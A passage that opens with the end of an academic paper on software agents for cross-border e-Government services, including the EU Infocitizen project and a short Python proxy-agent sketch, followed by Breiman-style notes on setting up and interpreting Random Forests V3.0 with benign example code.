More vague definitions describe agency and software agency as reacting to data received from sensors, acting on user’s behalf by software entities or acting independently in a dynamic environment [9]. Software agents are being applied to various operations which mainly include information gathering and filtering, and decision making. A carefully designed set of such actions creates an e-commerce flow, including: product brokering, merchant brokering, price negotiations and arranging additional services. The most common application of software agents is supporting Business-to-Customer (B2C) relations by providing customers with “shop bots” and “auction bots” (more in [10]). Although these solutions can be applied for Business-to-Business (B2B) relations as well, dealing with enterprise interaction requires more sophisticated tools. Multi-attribute and multi-subject auctions, contract negotiations and Supply Chain Management (SCM) require dedicated solutions to help companies with achieving the best return from each spent monetary unit. A distinguishable family of negotiating software agents was designed as the answer to businesses needs. The strongest advantage of using software agents, which are able to embed their code into a remote system, is the data mining ability [10]. Software agents can be applied to integrate government services both horizontally and vertically. The agent can localise the appropriate institution according to the given task and perform all the necessary information exchange with it. Moreover, the agent can design and execute automatically the whole chain of operations between multiple organisations to perform a cross-border operation. An automated, distributed e-Government applications architecture was proposed in [11]. The architecture uses web services, workflow specifications and software agents to automate one of the Finnish government’s business processes. A certain level of flexibility is achieved by utilising Business Process Execution Language (BPEL) and the software agents technology. A software agent dynamically creates a workflow process for each service call using available services description. A different approach was suggested in [12], where the Web Digital Government (WebDG) Web Services Management System was introduced. The WebDG utilises a central repository architecture for government services. The system creates a dedicated service for each request made by a citizen. The purpose of such an architecture is to achieve the highest Quality of Service (QoS). Software agents can be applied to customised e-Government services where a set of user profiles is created and an agent associates a profile with a citizen requesting the service. Such an approach can be used to create personalised services for citizens. Such an approach should result in the gain of approval for the administration initiatives. The User Agent associated with a citizen makes an inquiry to the Service Manager Agent for services which may be interesting for the user associated with the User Agent. Services are chosen according to data in profiles stored in the User Profile Database. Profiles consist of demographic data [13]. 4.2. The Infocitizen project The unlimited mobility of people and businesses is one of the foundations of the EU. The Infocitizen project addresses that mobility in the area of peoples migrations. The purpose of the Infocitizen is to use software agents to perform all registration duties required during citizens’ migrations. 
The goal of the project is to allow citizens to contact only the office in the destination country, so that they are not required to carry any additional documents from their home country. The only document which is sufficient for all purposes is the identification card [14]. The described idea suits the EU policy of removing all barriers to unrestricted mobility. With the Infocitizen project, all citizens can access any service concerning their registration duties from any place. The project consisted of designing a software agent architecture for local administrative units providing citizens’ registration services [14]. Unrestricted mobility is defined as the ability to perform all activities in any place within the EU, just as they would be done in the home country. All documentation related to a citizen’s birth, change of marital status, birth of a child, adoption of a child, registration of a new residence or taking a job could be filed in any appropriate office participating in the information exchange (presumably any public service office in the EU). The scope of the project covers the provision of services by public administration, the requesting of services by citizens and the interaction between a citizen and public administration units. The whole process is coordinated by the Infocitizen agent. The process of a citizen’s migration involves communicating with the citizen’s regional office to update his or her status. More complicated tasks are, for example, marriage and adopting a child. In the case of marriage, the offices of both spouses shall be queried about the marital status and the status shall be updated with the new information [14]. The Infocitizen’s technical architecture is based on the Java environment. The architecture is based on utilising a set of services. The services are combined at run-time when a business action is triggered [15].

Fig. 1. Logical structure of the Infocitizen architecture (UML sketch) [15]

The technical architecture of the Infocitizen is organised in the following way: each public administration unit has its own InfoCitizen Service Interface running on its own IT infrastructure, while the InfoCitizen Interoperability Agent is the central component of the InfoCitizen Platform. Agents are utilised on an “as-needed” basis. Several agents can exist within the architecture. The structure of the software components of the Infocitizen architecture is shown in Fig. 1. An administrative unit requests a service from an agent. The agent that responds to the request carries out all tasks, including getting any additional input from the citizen or administrative employee. The other components are: the services repository, the interface between the agent infrastructure and legacy systems in administration offices, and maintenance and development components [16].

4.3. Aiding interactions between governments and businesses

Relations between governments (or local governments) and business can be considered twofold [17]: 1) a company is a subject of administrative responsibilities (G2B relation), 2) multiple governments (or local governments) compete to make a company invest on their soil (B2G relation). Applying a software agent to act as a proxy that contacts all regions to gather the necessary information for a company would benefit both the company and the whole business environment; a sketch of such a proxy agent is given below. Companies can make their decisions based on accurate and exhaustive data, and local societies can compete with each other by making their regions more attractive for businesses.
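A hedged Python sketch of the proxy idea follows. The regional endpoints, resource vocabulary and scoring function are invented for illustration; a real deployment would rely on the agent platform and the service interfaces described above.

```python
from typing import Callable

# Hypothetical directory of regional information services: each entry maps a
# region name to a callable that reports the locally available resources.
RegionService = Callable[[dict], dict]

def gather_offers(regions: dict[str, RegionService], requirements: dict):
    """Proxy agent: query every region for the resources a company needs."""
    offers = []
    for name, query in regions.items():
        try:
            offers.append((name, query(requirements)))
        except ConnectionError:
            # A temporarily unreachable region is skipped; the agent can retry later.
            continue
    return offers

def rank_offers(offers, weights):
    """Score each regional offer against the company's weighted requirements."""
    def score(offer: dict) -> float:
        return sum(weights.get(k, 0) * offer.get(k, 0) for k in weights)
    return sorted(offers, key=lambda item: score(item[1]), reverse=True)

# Example with fictitious data: a company needing skilled workers and office space.
if __name__ == "__main__":
    regions = {
        "Region A": lambda req: {"workforce": 0.8, "office_space": 0.4},
        "Region B": lambda req: {"workforce": 0.5, "office_space": 0.9},
    }
    ranked = rank_offers(gather_offers(regions, {"sector": "IT"}),
                         weights={"workforce": 2.0, "office_space": 1.0})
    print(ranked[0][0], "is the best match")
```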
Local governments can even create coalitions with neighbouring societies from different countries to gain an attractive investor for the region. The “Euroregion”\(^5\) initiative is an example of cross-border cooperation of local governments within the EU. With software agents, interactions between companies and local governments/societies can be independent of administrative borders and of the boundaries of information systems. An agent can seek the necessary resources in a heterogeneous environment.

\(^5\) http://www.pomerania.net/

**Conclusions**

Trying to integrate an already decentralised administration structure would be a step back in the effort of making citizens’ and businesses’ flows easier. Applying an agent-ready framework, where citizens and businesses can set up a software agent to make their inquiries or perform their tasks, is a compromise between total centralisation and the autonomy of every country in managing its own systems. The most efficient vision of the government of the future is that of a single website where citizens and companies from any country belonging to a community (the European Union in the case of Europe) can do all government-related tasks regardless of their location and formal registration. The website should be accompanied by a single toll-free number where call-centre consultants can assist the user in solving all issues. The rules which apply to customer service in the government are no different from those which apply to businesses, as citizens are used to the customer service provided by businesses. Considering government services from the angle of the three-tier software model, the single website (one-stop-shop) should provide integration of all government services at the presentation layer. User input shall be converted to a common data model for an agent which creates a task based on the provided data. Enabling more services in the manner applied in the Infocitizen project makes it possible to achieve the desired interoperability level while preserving the autonomy of all countries in designing their administrations. If the EU requires all services to be extended to support the software agent infrastructure, countries can develop e-Government services according to their own visions, constrained only by the single condition of agent enablement. A software agent can take over the role of an institution whose duty is to support companies investing in a country. The agent can search for the best source of the requested resources regardless of the country, which will enable internal competition and create a strong motivation to improve the business environment. The agent can perform the matchmaking of companies and regions in order to achieve the maximal synergetic effect or proper alignment. Maximising the properties of individual regions creates a bottom-up effect on the economic growth of the joint European economic space.

References
{"Source-Url": "https://journals.umcs.pl/ai/article/download/3236/2432", "len_cl100k_base": 4352, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 21881, "total-output-tokens": 5691, "length": "2e12", "weborganizer": {"__label__adult": 0.0004925727844238281, "__label__art_design": 0.0012655258178710938, "__label__crime_law": 0.0022125244140625, "__label__education_jobs": 0.004673004150390625, "__label__entertainment": 0.0002386569976806641, "__label__fashion_beauty": 0.0003104209899902344, "__label__finance_business": 0.0307769775390625, "__label__food_dining": 0.0005631446838378906, "__label__games": 0.0015735626220703125, "__label__hardware": 0.0012388229370117188, "__label__health": 0.0007257461547851562, "__label__history": 0.0016231536865234375, "__label__home_hobbies": 0.00021779537200927737, "__label__industrial": 0.0012331008911132812, "__label__literature": 0.0006031990051269531, "__label__politics": 0.0272674560546875, "__label__religion": 0.000598907470703125, "__label__science_tech": 0.06707763671875, "__label__social_life": 0.0004601478576660156, "__label__software": 0.1949462890625, "__label__software_dev": 0.6591796875, "__label__sports_fitness": 0.0003287792205810547, "__label__transportation": 0.001590728759765625, "__label__travel": 0.0006918907165527344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 27063, 0.02081]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 27063, 0.39937]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 27063, 0.92825]], "google_gemma-3-12b-it_contains_pii": [[0, 2343, false], [2343, 5225, null], [5225, 8014, null], [8014, 10803, null], [10803, 13696, null], [13696, 16417, null], [16417, 19154, null], [19154, 20910, null], [20910, 23768, null], [23768, 27063, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2343, true], [2343, 5225, null], [5225, 8014, null], [8014, 10803, null], [10803, 13696, null], [13696, 16417, null], [16417, 19154, null], [19154, 20910, null], [20910, 23768, null], [23768, 27063, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 27063, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 27063, null]], "pdf_page_numbers": [[0, 2343, 1], [2343, 5225, 2], [5225, 8014, 3], [8014, 10803, 4], [10803, 13696, 5], [13696, 16417, 6], [16417, 19154, 7], [19154, 20910, 8], [20910, 23768, 9], [23768, 27063, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 27063, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
7025a8907b1ab001adee982dc2d630b840404fba
Notes On Setting Up, Using, And Understanding Random Forests V3.0

The V3.0 version of random forests contains some modifications and major additions to Version 2.2. It deletes some portions, like the density estimation procedure, which I found unreliable, and fixes a flaw in version 2. I apologize in advance for all bugs and would like to hear about them. To find out how this program works, read my paper "Random Forests-Random Features". It's available as a technical report if you go back to my department home page (www.stat.berkeley.edu) and click on technical reports. It will be published soon in the Machine Learning Journal. The program is written in extended Fortran 77 making use of a number of VAX extensions. It runs on SUN workstations f77 and on Absoft Fortran 77 (available for Windows) and on the free g77 compiler, but may have hang ups on other f77 compilers. If you find such problems and fixes for them, please let me know.

Random forests:
- does classification
- computes principal coordinates to use as variables
- computes variable importance (in a number of ways)
- computes proximity measures between cases
- computes scaling displays for the data
- gives a measure of outlyingness for each case

The last three can be done for the unsupervised case, i.e. no class labels. I have used proximities to cluster data and they seem to do a reasonable job. The new addition uses the proximities to do metric scaling of the data. The resulting pictures of the data are often useful. The first part of these notes contains instructions on how to set up a run of random forests. The second part contains the notes on the features of random forests and how they work.

I. Setting Parameters

The first seven lines following the parameter statement need to be filled in by the user.

**Line 1 Describing The Data**

**mdim0**=number of variables
**nsample0**=number of cases (examples or instances) in the data
**nclass**=number of classes
**maxcat**=the largest number of values assumed by a categorical variable in the data
**ntest**=the number of cases in the test set. NOTE: Put ntest=1 if there is no test set. Putting ntest=0 may cause compiler complaints.
**labels**=0 if the test set has no class labels, 1 if the test set has class labels.

If there are no categorical variables in the data set maxcat=1. If there are categorical variables, the number of categories assumed by each categorical variable has to be specified in an integer vector called cat, i.e. setting cat(5)=7 implies that the 5th variable is a categorical with 7 values. If maxcat=1, the values of cat are automatically set equal to one. If not, the user must fill in the values of cat in the early lines of code. For a J-class problem, random forests expects the classes to be numbered 1,2, ...,J. For an L valued categorical, it expects the values to be numbered 1,2, ... ,L. At present, L must be less than or equal to 32. A test set can have two purposes--first: to check the accuracy of RF on a test set. The error rate given by the internal estimate will be very close to the test set error unless the test set is drawn from a different distribution. Second: to get predicted classes for a set of data with unknown class labels. In both cases the test set must have the same format as the training set. If there is no class label for the test set, assign each case in the test set label class #1, i.e. put cl(n)=1, and set labels=0. Else set labels=1.
**Line 2 Setting Up The Run**

**mtry**=number of variables randomly selected at each node
**jbt**=number of trees to grow
**look**=how often you want to check the prediction error
**ipi**=set priors
**ndsize**=minimum node size

**mtry:** this is the only parameter that requires some judgment to set, but forests isn't too sensitive to its value as long as it's in the right ball park. I have found that setting mtry equal to the square root of mdim gives generally near optimum results. My advice is to begin with this value and try a value twice as high and half as low, monitoring the results by setting look=1 and checking the internal test set error for a small number of trees. With many noise variables present, mtry has to be set higher.

**jbt:** this is the number of trees to be grown in the run. Don't be stingy--random forests produces trees very rapidly, and it does not hurt to put in a large number of trees. If you want auxiliary information like variable importance or proximities, grow a lot of trees--say 1000 or more. Sometimes, I run out to 5000 trees if there are many variables and I want the variable importances to be stable.

**look:** random forests carries along an internal estimate of the test set error as the trees are being grown. This estimate is outputted to the screen every look trees. Setting look=10, for example, gives the internal error output every tenth tree added. If there is a labeled test set, it also gives the test set error. Setting look=jbt+1 eliminates the output. Do not be dismayed to see the error rates fluttering around slightly as more trees are added. Their behavior is analogous to the sequence of averages of the number of heads in tossing a coin.

**ipi:** pi is a real-valued vector of length nclass which sets prior probabilities for classes. ipi=0 sets these priors equal to the class proportions. If the class proportions are very unbalanced, you may want to put larger priors on the smaller classes. If different weightings are desired, set ipi=0 and specify the values of the \{pi(j)\} early in the code. These values are later normalized, so setting pi(1)=1, pi(2)=2 implies that the probability of seeing a class 2 instance is twice as large as that of seeing a class 1 instance.

**ndsize:** setting this to the value $k$ means that no node with fewer than $k$ cases will be split. The default that always gives good performance is $\text{ndsize}=1$. On large data sets, memory will be preserved and speed enhanced if ndsize is set larger. Usually, this results in only a negligible loss of accuracy.

**Line 3 Variables to Include**

This option is included as a matter of convenience. I coded it when searching to find which variables were "important". To use this option the data must be read in as $x_0(mdim0,nsample)$ instead of $x(mdim, nsample)$. The values of the $\text{msel}$ variable have to be set.

**ivarin**: only those variables for which $\text{msel} = 1$ will be used in prediction.
**ivarout**: only those variables for which $\text{msel} \neq 1$ will be used in prediction.

**Line 4 Options**

**imp** = 1 turns on the variable importances method described below.
**iprox** = 1 turns on the computation of the intrinsic proximity measures between any two cases.
**iaddcl** = 1 If the data is without labels (i.e. unsupervised data) then iaddcl = 1 labels this data class #1 and generates a synthetic data set of the same size which is labeled class #2. The synthetic data is sampled independently from the marginals of the original data.
**noutlier** = 1 computes an outlyingness measure for all cases in the data. If this is on, then iprox must also be switched to one. If iaddcl=1 then the outlyingness measure is computed only for the original data.

**Line 5 Scaling**

**iscale** = 1 turns on the scaling and extracts the scaling coordinates from the proximities. iprox=1 is necessary. If iaddcl=1, then the scaling is outputted only for the original data.
**msdim** is the number of scaling coordinates to output. Generally, 4-5 are more than sufficient.

**Line 6 Transform to Principal Coordinates**

**ipc=1** takes the x-values and computes principal coordinates from the covariance matrix of the x's. These will be the new variables for RF to operate on. This will not work right if some of the variables are categorical.
**mdimpc:** This is the number of principal components to extract. It has to be <=mdim.
**norm=1** normalizes all of the variables to mean zero and sd one before computing the principal components.

**Line 7 Output Controls**

Note: user must supply file names for all output listed below or send it to the screen.

**nsumout=1** writes out summary data to the screen. This includes error rates and the confusion matrix.

**infout=1** prints the following columns to a file
i) case number
ii) 1 if predicted class differs from true class, 0 else
iii) true class label
iv) predicted class label
v) margin=true class prob. minus the max of the other class prob.
vi)-vi+nclass) class probabilities

**ntestout=1** prints the following columns to a file
i) case number in test set
ii) true class (true class=1 if data is unlabeled)
iii) predicted class
iv)-iv+nclass) class probabilities

**imp=1** prints the following columns to a file
i) variable number
variable importances computed as:
ii) the % rise in error over the baseline error
iii) 100* the change in the margins averaged over all cases
iv) the proportion of cases for which the margin is decreased minus the proportion of increases
v) the gini increase by variable for the run

**impsetout=1** prints out for each case the following columns:
i) case number
ii) margin for the case
iii)-iii+mdim) altered margin due to noising up the mth variable

**iproxout=1** prints to file
i) case #1 number
ii) case #2 number
iii) proximity between case #1 and case #2

**iscale=1** prints out the following columns:
i) case number
ii) true class
iii) predicted class
iv) 0 if ii)=iii), 1 otherwise
v) scaling coordinates

**noutlier=1** prints the following columns to a file
i) sequence number
ii) class
iii) case number
iv) outlyingness measure

USER WORK: The user has to construct the read-in-the-data code, of which I have left an example. This needs to be done after the dimensioning of arrays. If maxcat >0 then the categorical values need to be filled in. If ipi=0, the user needs to specify the relative probabilities of the classes.

REMARKS: The proximities can be used in the clustering program of your choice. Their advantage is that they are intrinsic rather than an ad hoc measure. I have used them in some standard and home-brew clustering programs and gotten reasonable results; a small example of feeding them to an off-the-shelf clustering routine is sketched below. The proximities between class 1 cases in the unsupervised situation can be used to cluster. Extracting the scaling coordinates from the proximities and plotting scaling coordinate $i$ versus scaling coordinate $j$ gives illuminating pictures of the data.
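As a concrete illustration of the clustering remark, the sketch below feeds a proximity matrix (for example, assembled from the iproxout=1 output) to an off-the-shelf hierarchical clustering routine by converting proximities to distances. It assumes the proximities are already in a square NumPy array; SciPy here is just one possible choice of "clustering program".

```python
import numpy as np
from scipy.cluster.hierarchy import linkage, fcluster
from scipy.spatial.distance import squareform

def cluster_from_proximities(prox: np.ndarray, n_clusters: int) -> np.ndarray:
    """Cluster cases using 1 - prox as the distance between cases."""
    dist = 1.0 - prox                     # larger proximity -> smaller distance
    np.fill_diagonal(dist, 0.0)           # a case is at distance 0 from itself
    condensed = squareform(dist, checks=False)
    tree = linkage(condensed, method="average")
    return fcluster(tree, t=n_clusters, criterion="maxclust")

# Example with a random symmetric proximity matrix standing in for RF output.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    p = rng.uniform(0.0, 1.0, size=(20, 20))
    prox = (p + p.T) / 2.0
    np.fill_diagonal(prox, 1.0)
    print(cluster_from_proximities(prox, n_clusters=2))
```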
Usually, $i=1$ and $j=2$ give the most information (see the notes below). There are four measures of variable importance: they complement each other. Except for the 4th, they are based on the test sets left out of each tree construction. On microarray data with 5000 variables and less than 100 cases, the different measures single out much the same variables (see notes below). But I have found one synthetic data set where the 3rd measure was more sensitive than the first three. Sometimes, finding the effective variables requires some hunting. If the effective variables are clear-cut, then the first measure will find them. But if the number of variables is large compared to the number of cases, and if the predictive power of the individual variables is small, the other measures can be useful. Random forests does not overfit. You can run as many trees as you want. Also, it is fast. Running on a 250 MHz machine, the current version using a training set with 800 cases, 8 variables, and $mtry=1$, constructs each tree in .1 seconds. On a training set with 2200 cases, 11 variables, and $mtry=3$, each tree is constructed in .2 seconds. It takes 6 seconds per tree on a training set with 15000 cases and 16 variables with $mtry=4$, while also making computations for a 5000 member test set. The present version of random forests does not handle missing values. A future version will. It is up to the user to decide how to deal with these. My current preferred method is to replace each missing value by the median of its column. My impression is that because of the randomness and the many trees grown, filling in missing values with sensible values does not affect accuracy much. For large data sets, if proximities are not required, the major memory requirement is the storage of the data itself, and the three integer arrays $a, at, b$. If there are less than 64,000 cases, these latter three may be declared integer*2 (non-negative). Then the total storage requirement is about three times the size of the data set. If proximities are calculated, storage requirements go up by the square of the number of cases times eight bytes (double precision).

Outline Of How Random Forests Works

Usual Tree Construction--Cart

Node=subset of data. The root node contains all data. At each node, search through all variables to find the best split into two children nodes. Split all the way down and then prune the tree up to get minimal test set error.

Random Forests Construction

The root node contains a bootstrap sample of data of the same size as the original data. A different bootstrap sample is drawn for each tree to be grown. An integer K is fixed, K<<number of variables. K is the only parameter that needs to be specified. The default is the square root of the number of variables. At each node, K of the variables are selected at random. Only these variables are searched through for the best split. The largest tree possible is grown and is not pruned. The forest consists of N trees. To classify a new object having coordinates \( x \), put \( x \) down each of the N trees. Each tree gives a classification for \( x \). The forest chooses the classification having the most out of N votes.

Transformation to Principal Coordinates

One of the users lent us a data set in which the use of a few principal components as variables reduced the error rate by 2/3rds.
On experimenting, a few other data sets were found where the error rate was significantly reduced by pre-transforming to principal coordinates. As a convenience to users, a pre-transformation subroutine was incorporated into this version.

**Random Forests Tools**

The design of random forests is to give the user a good deal of information about the data besides an accurate prediction. Much of this information comes from using the "out-of-bag" cases in the training set that have been left out of the bootstrapped training set. The information includes:
a) **Test set error rate**
b) **Variable importance measures**
c) **Intrinsic proximities between cases**
d) **Scaling coordinates based on the proximities**
e) **Outlier detection**
I will explain how these function and give applications, both for labeled and unlabeled data.

**Test Set Error Rate**

In random forests, there is no need for cross-validation or a separate test set to get an unbiased estimate of the test set error. It is gotten internally, during the run, as follows: Each tree is constructed using a different bootstrap sample from the original data. About one-third of the cases are left out of the bootstrap sample and not used in the construction of the kth tree. Put each case left out in the construction of the kth tree down the kth tree to get a classification. In this way, a test set classification is gotten for each case in about one-third of the trees. Let the final test set classification of the forest be the class having the most votes. Comparing this classification with the class label present in the data gives an estimate of the test set error.

**Variable Importance**

Because of the need to know which variables are important in the classification, random forests has four different ways of looking at variable importance. Sometimes influential variables are hard to spot--using these four measures provides more information.

**Measure 1** To estimate the importance of the mth variable: in the left-out cases for the kth tree, randomly permute all values of the mth variable. Put these new covariate values down the tree and get classifications. Proceed as though computing a new internal error rate. The amount by which this new error exceeds the original test set error is defined as the importance of the mth variable.

**Measures 2 and 3** For the nth case in the data, its margin at the end of a run is the proportion of votes for its true class minus the maximum of the proportion of votes for each of the other classes. The 2nd measure of importance of the mth variable is the average lowering of the margin across all cases when the mth variable is randomly permuted as in method 1. The third measure is the count of how many margins are lowered minus the number of margins raised.

**Measure 4** The splitting criterion used in RF is the gini criterion--also used in CART. At every split one of the mtry variables is used to form the split and there is a resulting decrease in the gini. The sum of all decreases in the forest due to a given variable, normalized by the number of trees, forms measure 4.

**Additional Case-Wise Information** For the mth variable, the values of all of the margins in the training set with the mth variable noised up are computed. When the graph of these values is compared to the graph of the original margins, interesting information about individual cases often emerges. A short sketch of the out-of-bag error estimate and the permutation importance (measure 1) appears below; worked examples follow.
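The sketch uses scikit-learn's random forest as a stand-in for the Fortran program; it is illustrative only and not the original implementation.

```python
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.ensemble import RandomForestClassifier

X, y = load_breast_cancer(return_X_y=True)
mdim = X.shape[1]

# mtry ~ sqrt(mdim), many trees, out-of-bag estimate switched on.
forest = RandomForestClassifier(n_estimators=1000,
                                max_features=int(np.sqrt(mdim)),
                                oob_score=True, random_state=0).fit(X, y)
print("internal (out-of-bag) error:", 1.0 - forest.oob_score_)

# Measure 1, approximated: permute one variable at a time and record the rise
# in the error on the training set. (The original program permutes only the
# cases left out of each tree; scikit-learn's permutation_importance utility
# does that out-of-sample version properly.)
baseline = 1.0 - forest.score(X, y)
rng = np.random.default_rng(0)
for m in range(mdim):
    Xp = X.copy()
    Xp[:, m] = rng.permutation(Xp[:, m])
    err = 1.0 - forest.score(Xp, y)
    print(f"variable {m}: importance = {err - baseline:.4f}")
```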
Some of the examples below were done on version 1 and so may differ somewhat from the version 3 output.

An Example--Hepatitis Data

Data: survival or non-survival of 155 hepatitis patients with 19 covariates. Analyzed by Diaconis and Efron in a 1983 Scientific American article. The original Stanford Medical School analysis concluded that the important variables were numbers 6, 12, 14, 19. Efron and Diaconis drew 500 bootstrap samples from the original data set and used a similar procedure, including logistic regression, to isolate the important variables in each bootstrapped data set. Their conclusion: "Of the four variables originally selected not one was selected in more than 60 percent of the samples. Hence the variables identified in the original analysis cannot be taken too seriously."

Logistic Regression Analysis

The error rate for logistic regression is 17.4%. Variable importance is based on the absolute values of the coefficients of the variables divided by their standard deviations. The conclusion is that variables 7 and 11 are the most important covariates. When logistic regression is run using only these two variables, the cross-validated error rate rises to 22.9%.

**Analysis Using Random Forests**

The error rate is 12.3%--a 30% reduction from the logistic regression error. Variable importances (measure 1) are graphed below: Two variables are singled out--the 12th and the 17th. The test set error rates running 12 and 17 alone were 14.3% each. Running both together did no better. Virtually all of the predictive capability is provided by a single variable, either 12 or 17 (they are highly correlated). The standard procedure when fitting data models such as logistic regression is to delete variables; Diaconis and Efron (1983) state, "...statistical experience suggests that it is unwise to fit a model that depends on 19 variables with only 155 data points available." Newer methods in Machine Learning thrive on variables--the more the better. There is no need for variable selection. On a sonar data set with 208 cases and 60 variables, the Random Forests error rate is 14%; logistic regression has a 50% error rate.

**Microarray Analysis**

Random forests was run on a microarray lymphoma data set with three classes, a sample size of 81 and 4682 variables (genes) without any variable selection. The error rate was low (1.2%) using mtry=150. What was also interesting from a scientific viewpoint was an estimate of the importance of each of the 4682 genes. The graphs below were produced by a run of random forests. The graphs show that measure 1 has the least sensitivity, showing only one significant variable. Measure 2 has more, showing not only the activity around the gene singled out by measure 1 but also a secondary burst of activity higher up. Measure 3 has too much sensitivity, fingering too many variables.

**Class probability estimates**

At run's end, for each case there is an out-of-bag estimate of the probability that it is in each one of the J classes. This estimate is given by the proportion of votes for each class. For each member of a test set (with or without class labels), these probabilities are also estimated.

**An Astronomical Example**

Bob Becker allowed the use of his quasar data set of 2000 astronomical objects, of which about half have been verified as quasars. Verification is expensive, but there are some variables that are cheap to measure. Using these cheap variables the data set was run through random forests and for each case a probability $P_Q(n)$ was output, giving the probability that the nth case is a quasar.
There is also an unverified test set which we ran through that assigned a probability $P_Q(n)$ to the $n$th case in the test set. Telescope time is valuable--the question is: given an estimate of $P_Q$ for a stellar object, should verification be undertaken? An answer is provided by the training set. For instance, if all objects with $P_Q > .9$ are verified, then about 95% of them will be quasars.

An intrinsic proximity measure

Since an individual tree is unpruned, the terminal nodes will contain only a small number of instances. Run all cases in the training set down the tree. If case i and case j both land in the same terminal node, increase the proximity between i and j by one. At the end of the run, the proximities are divided by twice the number of trees in the run and the proximity between a case and itself is set equal to one. To cluster, use the above proximity measures.

Example--Bupa Liver Disorders

This is a two-class biomedical data set consisting of the covariates
1. mcv mean corpuscular volume
2. alkphos alkaline phosphatase
3. sgpt alanine aminotransferase
4. sgot aspartate aminotransferase
5. gammagt gamma-glutamyl transpeptidase
6. drinks number of half-pint equivalents of alcoholic beverage drunk per day
The first five attributes are the results of blood tests thought to be related to liver functioning. The 345 patients are classified into two classes by the severity of their liver disorders. The misclassification error rate is 28% in a Random Forests run. What can we learn about this data?

A) Variable Importance (method 1)

[Figure 2: Variable Importance - BUPA Liver]

Blood tests 3 and 5 are the most important, followed by test 4.

B) Clustering

Using the proximity measure outputted by Random Forests to cluster, there are two class #2 clusters. In each of these clusters, the average of each variable is computed and plotted. Something interesting emerges. The class two subjects consist of two distinct groups: those that have high scores on blood tests 3, 4, and 5, and those that have low scores on those tests. We will revisit this example below.

**Scaling Coordinates**

The proximities between cases n and k form a matrix \{prox(n,k)\}. From their definition, it is easy to show that this matrix is symmetric, positive definite and bounded above by 1, with the diagonal elements equal to 1. It follows that the values 1-prox(n,k) are squared distances in a Euclidean space of dimension not greater than the number of cases. For more background on scaling see "Multidimensional Scaling" by T.F. Cox and M.A. Cox. Let \(\text{prox}(n,-)\) be the average of \(\text{prox}(n,k)\) over the 2nd coordinate, and \(\text{prox}(-,-)\) the average over both coordinates. Then the matrix
\[ \text{cv}(n,k) = 0.5\,\big(\text{prox}(n,k)-\text{prox}(n,-)-\text{prox}(k,-)+\text{prox}(-,-)\big) \]
is the matrix of inner products of the distances and is also positive definite symmetric. Let the eigenvalues of \(\text{cv}\) be \(\lambda(l)\) and the eigenvectors \(v_l(n)\). Then the vectors
\[ x(n) = \big(\sqrt{\lambda(1)}\,v_1(n), \sqrt{\lambda(2)}\,v_2(n), \ldots\big) \]
have squared distances between them equal to \(1 - \text{prox}(n,k)\). We refer to the values of \(\sqrt{\lambda(j)}\,v_j(n)\) as the \(j\)th scaling coordinate. In metric scaling, the idea is to approximate the vectors \(x(n)\) by the first few scaling coordinates. This is done in random forests by extracting the msdim largest eigenvalues and corresponding eigenvectors of the \(\text{cv}\) matrix. The two dimensional plots of the \(i\)th scaling coordinate vs.
the \(j\)th often gives useful information about the data. The most useful is usually the graph of the 2nd vs. the 1st. We illustrate with three examples. The first is the graph of the 2nd vs. 1st scaling coordinates for the liver data. The two arms of the class \#2 data in this picture correspond to the two clusters found and discussed above. The next example uses the microarray data. With 4682 variables, it is difficult to see how to cluster this data. Using proximities and the first two scaling coordinates gives this picture:

[Figure: Metric Scaling Microarray Data]

Random forests misclassifies one case. This case is represented by the isolated point in the lower left hand corner of the plot. The third example is glass data with 214 cases, 9 variables and 6 classes. This data set has been extensively analyzed (see Pattern Recognition and Neural Networks by B.D. Ripley). Here is a plot of the 2nd vs. the 1st scaling coordinates: None of the analyses to date have picked up this interesting and revealing structure of the data--compare the plots in Ripley's book.

**Outlier Location**

Outliers are defined as cases having small proximities to all other cases. Since the data in some classes is more spread out than others, outlyingness is defined only with respect to other data in the same class as the given case. To define a measure of outlyingness, we first compute, for a case \( n \), the sum of the squares of \( \text{prox}(n,k) \) for all \( k \) in the same class as case \( n \). Take the inverse of this sum--it will be large if the proximities \( \text{prox}(n,k) \) from \( n \) to the other cases \( k \) in the same class are generally small. Denote this quantity by \( \text{out}(n) \). For all n in the same class, compute the median of the out(n), and then the mean absolute deviation from the median. Subtract the median from each out(n) and divide by the deviation to give a normalized measure of outlyingness. The values less than zero are set to zero. Generally, a value above 10 is reason to suspect the case of being outlying. Here is a graph of outlyingness for the microarray data. There are two possible outliers--one is the first case in class 1, the second is the first case in class 2. As a second example, we plot the outlyingness for the Pima Indians diabetes data. This data set has 768 cases, 8 variables and 2 classes. It has been used often as an example in Machine Learning papers but has been suspected of containing a number of outliers. If 10 is used as a cutoff point, there are 12 cases suspected of being outliers.

**Analyzing Unlabeled Data**

